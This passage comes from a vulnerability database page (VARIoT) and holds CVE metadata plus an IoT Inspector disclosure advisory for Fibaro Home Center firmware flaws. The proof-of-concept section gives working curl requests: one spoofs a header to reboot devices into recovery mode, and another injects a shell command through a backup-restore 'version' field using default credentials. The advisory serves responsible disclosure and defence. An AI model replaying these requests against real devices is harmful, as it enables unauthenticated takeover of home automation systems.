here:\n\nhttps://www.iot-inspector.com/responsible-disclosure-policy/\n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nInterested in using IoT Inspector for your research or product?\n\n \n\nMail: research at iot-inspector dot com\n\nWeb: https://www.iot-inspector.com\n\nBlog: https://www.iot-inspector.com/blog/\n\nTwitter: https://twitter.com/iotinspector\n\n \n\nEOF Marton Illes / @2021\n\n \n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          }
        ],
        "trust": 1.08
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "162243",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20991",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "id": "VAR-202104-0489",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.5
      },
      "last_update_date": "2024-11-23T22:05:09.403000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "FIBARO Home Center 2 Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=148429"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-77",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2021/apr/27"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/162243/fibaro-home-center-mitm-missing-authentication-code-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20991"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_ip.php?pk_accesspoint=${hc2_seria"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20990"
          },
          {
            "trust": 0.1,
            "url": "https://securelist.com/fibaro-smart-home/91416/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/responsible-disclosure-policy/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/blog/"
          },
          {
            "trust": 0.1,
            "url": "http://device:8000/services/system/reboot.php"
          },
          {
            "trust": 0.1,
            "url": "http://127.0.0.1:8000;"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/iotinspector"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_support_route.php?pk_accesspoint=\u0027"
          },
          {
            "trust": 0.1,
            "url": "http://device/services/system/backups.php"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_port.php?pk_accesspoint=${hc2_s"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20989"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20992"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/en/about-us/"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "date": "2021-04-20T16:14:10",
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "date": "2021-04-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "date": "2021-04-19T14:15:11.787000",
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "date": "2022-04-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "date": "2024-11-21T05:47:20.827000",
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FIBARO Home Center 2 Command injection vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0468

    Vulnerability from variot - Updated: 2024-11-23 22:05

    In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode. IoT Inspector Research Lab Advisory IOT-20210408-0

    ~~~
    
                 title: Multiple vulnerabilities 
    
        vendor/product: Fibaro Home Center Light / Fibaro Home Center 2
    
                        https://www.fibaro.com/
    
    vulnerable version: 4.600 and older
    
         fixed version: 4.610
    
            CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, 
    
                        CVE-2021-20992
    
                impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    
                        9.8 (critical)
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    
                        7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    
                        8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    
              reported: 2020-11-18
    
           publication: 2021-04-08
    
                    by: Marton Illes, IoT Inspector Research Lab
    
                        https://www.iot-inspector.com/
    
    
    
    
    
    
    
    Vendor description:
    
    -------------------
    
    "FIBARO is a global brand based on the Internet of Things technology. It 
    
    provides solutions for building and home automation. FIBARO's headquarters
    
    and factory are located in Wysogotowo, 3 miles away from Poznan. The company
    
    employs app. 250 employees."
    
    
    
    https://www.fibaro.com/en/about-us/
    
    
    
    
    
    Vulnerability overview/description:
    
    -----------------------------------
    
    1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)
    
    Home Center devices initiate SSH connections to the Fibaro cloud to provide 
    
    remote access and remote support capabilities. This connection can be 
    
    intercepted using a man-in-the-middle attack and a device initiated remote 
    
    port-forward channel can be used to connect to the web management interface. 
    
    
    IoT Inspector identified a disabled SSH host key check, which enables 
    
    man-in-the-middle attacks. 
    
    
    
    By initiating connections to the Fibaro cloud an attacker can eavesdrop on 
    
    communication between the user and the device. As communication inside the 
    
    SSH port-forward is not encrypted (see #4 on management interface), user 
    
    sessions, tokens and passwords can be hijacked. In recovery mode, an attacker can 
    
    upload firmware without authentication. (Potentially an earlier version with
    
    
    known remote command execution vulnerability, see #3)
    
    
    
    3) Authenticated remote command execution (versions before 4.550) 
    
    (CVE-2021-20991)
    
    An authenticated user can run commands as root user using a command
    injection 
    
    vulnerability. 
    
    Similar problems were also discovered by Pavel Cheremushkin from Kaspersky 
    
    ICS Cert: https://securelist.com/fibaro-smart-home/91416/
    
    
    
    4) Unencrypted management interface (CVE-2021-20992)
    
    Home Center devices provide a web based management interface over
    unencrypted 
    
    HTTP protocol. Communication between the user and the device can be 
    
    eavesdropped to hijack sessions, tokens, and passwords. The management 
    
    interface is only available over HTTP on the local network. The vendor 
    
    recommends using the cloud-based management interface, which is accessible
    over 
    
    HTTPS and requests are forwarded via an encrypted SSH connection between the
    
    
    Fibaro cloud and the device. 
    
    
    
    
    
    Proof of concept:
    
    -----------------
    
    1) Cloud SSH Connection Man-in-the-Middle Attack
    
    
    
    Home Center devices initiate a SSH connection to the Fibaro cloud
    
    
    
    
    
    ./etc/init.d/fibaro/RemoteAccess
    
    
    
    <snip>
    
    DAEMON=/usr/bin/ssh
    
    
    
    .... 
    
    
    
    case "$1" in
    
      start)
    
    
    
                    ..... 
    
    
    
        # get IP
    
        local
    GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria
    l}&HW_Key=${HW_Key}"
    
        local IP_Response; IP_Response=$(curl -f -s -S --retry 3
    --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')
    
    
    
        # get PORT
    
        local
    GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S
    erial}&HW_Key=${HW_Key}"
    
        local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3
    --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')
    
    
    
                    .... 
    
    
    
        start-stop-daemon --start --background --pidfile "${PIDFILE}"
    --make-pidfile --startas /usr/bin/screen \
    
        -- -DmS ${NAME} ${DAEMON} -y -K 30 -i
    /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80
    remote2@"${IP_Response}"
    
    </snip>
    
    
    
    The device uses dropbear ssh to initiate the connection; option -y disables
    any 
    
    host-key checks, voiding much of the otherwise added transport-layer
    security 
    
    by SSH: "Always accept hostkeys if they are unknown."
    
    
    
    The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.: 
    
    lb-1.eu.ra.fibaro.com
    
    
    
    An attacker can use DNS spoofing or other means to intercept the connection. 
    By 
    
    using any hostkey, the attacker can successfully authenticate the SSH 
    
    connection. Once the connection is authenticated, the client initiates a
    remote 
    
    port-forward:
    
    -R "${PORT_Response}":localhost:80
    
    
    
    This enables the attacker to access port 80 (management interface) of the 
    
    device. 
    
    
    
    A similar problem exists for remote support connections:
    
    
    
    ./opt/fibaro/scripts/remote-support.lua
    
    <snip>
    
    function handleResponse(response)
    
      responseJson = json.decode(response.data)
    
      print(json.encode(responseJson))
    
    
    
      local autoSSHCommand = 'ssh -y -K 30 -i
    /etc/dropbear/dropbear_rsa_host_key -R '  .. responseJson.private_ip..  ':'
    .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip
    
      os.execute(autoSSHCommand)
    
    end
    
    
    
    function getSupportData()
    
      remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint='
    .. serialNumber .. '&HW_Key=' .. HWKey
    
      print(remoteUrl)
    
    
    
      http = net.HTTPClient({timeout = 5000})
    
    
    
      http:request(remoteUrl, {
    
        options = {
    
          method = 'GET'
    
        },
    
        success = function(response)
    
          handleResponse(response)
    
        end,
    
        error = function(error)
    
          print(error)
    
        end
    
      })
    
    end
    
    
    
    getSupportData()
    
    </snip>
    
    
    
    Here, the remote support endpoint returns the following data:
    
    {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY
    .ZZZ"}
    
    
    
    The same dropbear ssh client is used with option -y. In this case, port 22 
    
    (ssh) is made accessible through the port-forward. However, the device only 
    
    allows public key authentication with a hard-coded SSH key. No further
    testing 
    
    has been done on compromising the support SSH connection. 
    
    
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode
    
    
    
    The device is running a nginx server, which forwards some requests to a 
    
    lighttpd server (8000) for further processing:
    
    <snip>
    
                                    proxy_set_header X-Forwarded-For
    $proxy_add_x_forwarded_for;
    
    
    
            location ~* \.php$ {
    
                proxy_pass   http://127.0.0.1:8000;
    
            }
    
    
    
            location ~* \.php\?.* {
    
                proxy_pass   http://127.0.0.1:8000;
    
            }
    
    </snip>
    
    
    
    The lighttpd server is not only accessible locally, but also via the local 
    
    network. 
    
    
    
    Authentication and authorization is implemented in PHP and there is a
    special 
    
    check for connections originating from within the host. However, when
    checking 
    
    the remote IP address, the header X-Forwarded-For is also considered:
    
    
    
    ./var/www/authorize.php
    
    <snip>
    
    function isLocalRequest()
    
    {
    
        $ipAddress = "";
    
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) 
    
            $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    
        else
    
            $ipAddress = $_SERVER['REMOTE_ADDR'];
    
    
    
        $whitelist = array( '127.0.0.1', '::1' );
    
        if(in_array($ipAddress, $whitelist))
    
            return true;
    
    
    
        return false;
    
    }
    
    </snip>
    
    
    
    As the lighttpd service available via the network, an attacked can inject
    the 
    
    required header X-Forwarded-For as well. 
    
    
    
    The check isLocalRequest is used to "secure" multiple endpoints:
    
    
    
    ./var/www/services/system/shutdown.php
    
    <snip>
    
    <?php
    
        require_once("../../authorize.php");
    
    
    
        if (!isLocalRequest() && !isAuthorized())
    
        {
    
           sendUnauthorized();
    
        }
    
        else
    
        {
    
            exec("systemShutdown");
    
        }
    
    ?>
    
    </snip>
    
    
    
    ./var/www/services/system/reboot.php
    
    <snip>
    
    
    
    function authorize() 
    
    {
    
        return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,
    role::INSTALLER));
    
    }
    
    
    
    function handlePOST($text)
    
    {
    
        if (!isLocalRequest() && !authorize())
    
        {
    
           sendUnauthorized();
    
           return;
    
        }
    
    
    
        $params = tryDecodeJson($text);
    
        if(!is_null($params) && isset($params->recovery) && $params->recovery
    === true)
    
            exec("rebootToRecovery");
    
        else
    
            exec("systemReboot");
    
    }
    
    
    
    $requestBody = file_get_contents('php://input');
    
    $requestMethod = $_SERVER['REQUEST_METHOD'];
    
    
    
    if ($requestMethod == "POST") 
    
        handlePOST($requestBody);
    
    else 
    
        setStatusMethodNotAllowed();
    
    
    
    </snip>
    
    
    
    An attacker can issue the the following HTTP request to reboot the device
    into 
    
    recovery mode:
    
    curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d
    '{"recovery":true}'  http://DEVICE:8000/services/system/reboot.php
    
    
    
    In recovery mode, firmware images can be updated without authentication. 
    
    
    
    
    
    3) Authenticated remote command execution (versions before 4.550)
    
    
    
    Backup & restore operations could be triggered though HTTP endpoints:
    
    
    
    ./var/www/services/system/backups.php
    
    <snip>
    
    function restoreBackup($params)
    
    {
    
        if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)
    
        {
    
            setStatusTooManyRequests();
    
            return;
    
        }
    
    
    
        $type = $params->type;
    
        $id = $params->id;
    
        $version = $params->version;
    
    
    
        if (is_null($id) || !is_numeric($id) || $id < 1 ) 
    
        {
    
            setStatusBadRequest();
    
            return;
    
        }
    
    
    
        $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3");
    
    
    
        if ($type == "local" && $hcVersion == "HC2" || $type == "remote") 
    
        {
    
            $version ?
    
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
    $id . ' ' . $version) :
    
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
    $id);
    
        }
    
        else 
    
        {
    
            setStatusBadRequest();
    
            return;
    
        }
    
    
    
        setStatusAccepted();
    
    }
    
    </snip>
    
    
    
    The parameter $version is not sanitized or escaped, which allows an attacker
    to 
    
    inject shell commands into the exec() call:
    
    
    
    cat > /tmp/exploit <<- EOM
    
    {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1;
    INJECTED COMMAND"}}
    
    EOM
    
    
    
    curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type:
    application/json' -d@/tmp/exploit  http://DEVICE/services/system/backups.php
    
    
    
    
    Version 4.550 and later have proper escaping:
    
    <snip>
    
        $version = escapeshellarg($params->version);
    
    </snip>
    
    
    
    
    
    4) Unencrypted management interface
    
    
    
    NMMAP shows a few open ports on the box:
    
    PORT     STATE SERVICE
    
    22/tcp   open  ssh
    
    80/tcp   open  http
    
    8000/tcp open  http-alt
    
    
    
    Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. 
    
    
    
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

    Vulnerable / tested versions:


    Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version

    at the time of the discovery

    Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530

    Solution:


    Upgrade to the version 4.610 or latest version, which fixes vulnerabilities 1,

    2 and 3.

    Vulnerability 4 is not fixed as the vendor assumes that the local network is

    trusted and the device only provides wired network access. Furthermore, the

    vendor recommends using the cloud-based management interface, which is

    accessible over HTTPS and requests are forwarded via an encrypted SSH

    connection between the Fibaro cloud and the device.

    Advisory URL:


    https://www.iot-inspector.com/blog/advisory-fibaro-home-center/

    Vendor contact timeline:


    2020-11-18: Contacting Fibaro through support@fibaro.com,

            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com
    

    2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn

    2020-11-24: Adivsory sent to Fibaro by email

    2020-12-01: Fibaro confirmed the receipt of the advisory

    2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes

    2021-03-16: Fibaro beta release (4.601) with the fixes

    2021-03-24: Fibaro applies for CVE numbers

    2021-03-31: Fibaro GA release (4.610) with the fix

    2021-04-08: IoT Inspector Research Lab publishes advisory

    ~~~
    
    
    
    The IoT Inspector Research Lab is an integrated part of IoT Inspector. 
    
    
    
    IoT Inspector is a platform for automated security analysis and compliance 
    
    checks of IoT firmware. Our mission is to secure the Internet of Things. In 
    
    order to discover vulnerabilities and vulnerability patterns within IoT
    devices
    
    and to further enhance automated identification that allows for scalable 
    
    detection within IoT Inspector, we conduct excessive security research in
    the
    
    area of IoT. 
    
    
    
    Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT 
    
    firmware, we aim to responsibly disclose relevant information to the vendor
    
    of the affected IoT device as well as the general public in a way that 
    
    minimizes potential harm and encourages further security analyses of IoT 
    
    systems. 
    
    
    
    You can find our responsible disclosure policy here:
    
    https://www.iot-inspector.com/responsible-disclosure-policy/
    
    
    
    
    
    

    ~~~

    Interested in using IoT Inspector for your research or product?

    Mail: research at iot-inspector dot com

    Web: https://www.iot-inspector.com

    Blog: https://www.iot-inspector.com/blog/

    Twitter: https://twitter.com/iotinspector

    EOF Marton Illes / @2021

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0468",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "home center lite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.600"
          },
          {
            "model": "home center 2",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.600"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Marton Illes",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-20990",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-20990",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-20990",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-20990",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-20990",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-1335",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-20990",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode. IoT Inspector Research Lab Advisory IOT-20210408-0\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n             title: Multiple vulnerabilities \n\n    vendor/product: Fibaro Home Center Light / Fibaro Home Center 2\n\n                    https://www.fibaro.com/\n\nvulnerable version: 4.600 and older\n\n     fixed version: 4.610\n\n        CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, \n\n                    CVE-2021-20992\n\n            impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    9.8 (critical)\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n                    8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n          reported: 2020-11-18\n\n       publication: 2021-04-08\n\n                by: Marton Illes, IoT Inspector Research Lab\n\n                    https://www.iot-inspector.com/\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVendor description:\n\n-------------------\n\n\"FIBARO is a global brand based on the Internet of Things technology. It \n\nprovides solutions for building and home automation. FIBARO\u0027s headquarters\n\nand factory are located in Wysogotowo, 3 miles away from Poznan. The company\n\nemploys app. 250 employees.\"\n\n \n\nhttps://www.fibaro.com/en/about-us/\n\n \n\n \n\nVulnerability overview/description:\n\n-----------------------------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)\n\nHome Center devices initiate SSH connections to the Fibaro cloud to provide \n\nremote access and remote support capabilities. This connection can be \n\nintercepted using a man-in-the-middle attack and a device initiated remote \n\nport-forward channel can be used to connect to the web management interface. \n\n\nIoT Inspector identified a 